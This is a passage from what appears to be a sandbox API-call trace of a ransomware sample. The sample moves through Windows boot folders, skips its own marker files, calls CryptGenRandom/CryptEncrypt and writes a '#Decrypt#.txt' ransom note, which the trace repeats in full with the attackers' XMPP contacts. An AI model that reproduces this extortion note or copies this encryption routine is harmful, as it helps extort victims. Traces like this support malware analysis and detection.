[0124.841] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0124.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.841] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.841] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.841] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0124.855] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.855] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.855] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.855] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.856] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0124.856] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.856] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 
[0124.856] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.856] lstrlenW (lpString=".testttjffg") returned 11 [0124.856] StrStrW (lpFirst="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.857] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.910] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.911] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.911] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\#Decrypt#.txt") returned 31 [0124.911] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\#Decrypt#.txt" (normalized: "c:\\boot\\pt-pt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.911] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite 
to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0124.911] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.913] lstrlenA (lpString="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") returned 1368 [0124.914] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.914] CloseHandle (hObject=0x1dc) returned 1 [0124.914] GetProcessHeap () returned 0x780000 [0124.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.914] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0124.914] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0124.915] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0124.915] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0124.915] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0124.915] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.915] GetProcessHeap () returned 0x780000 [0124.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.915] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0124.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.916] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0124.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.916] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.916] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0124.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.917] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.917] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.917] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.917] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0124.917] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.917] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.917] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.917] lstrlenW (lpString=".testttjffg") returned 11 [0124.917] StrStrW (lpFirst="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.918] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.918] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.918] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.918] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.918] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.919] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\#Decrypt#.txt") returned 31 [0124.919] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\#Decrypt#.txt" (normalized: "c:\\boot\\ru-ru\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.919] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.920] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.922] lstrlenA (lpString="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") returned 1368 [0124.922] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.922] CloseHandle (hObject=0x1dc) returned 1 [0124.922] GetProcessHeap () returned 0x780000 [0124.922] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.922] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0124.923] lstrcmpiW (lpString1="sv-SE", lpString2="Windows") returned -1 [0124.923] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0124.923] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0124.923] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0124.923] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\sv-SE", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.923] GetProcessHeap () returned 0x780000 [0124.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.923] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0124.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.924] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.924] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0124.924] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.924] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.925] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.925] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0124.925] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0124.925] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.925] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.925] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0124.925] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.925] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.925] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.926] lstrlenW (lpString=".testttjffg") returned 11 [0124.926] StrStrW (lpFirst="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.926] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.926] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.926] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.002] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.002] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.002] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\#Decrypt#.txt") returned 31 [0125.002] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\#Decrypt#.txt" (normalized: "c:\\boot\\sv-se\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.003] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0125.003] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.004] lstrlenA (lpString="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") returned 1368 [0125.004] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.005] CloseHandle (hObject=0x1dc) returned 1 [0125.005] GetProcessHeap () returned 0x780000 [0125.005] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.005] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0125.005] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0125.005] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0125.006] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0125.006] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0125.006] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.006] GetProcessHeap () returned 0x780000 [0125.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.006] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0125.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.007] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.007] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0125.007] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.007] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0125.007] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0125.008] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.008] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.008] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, 
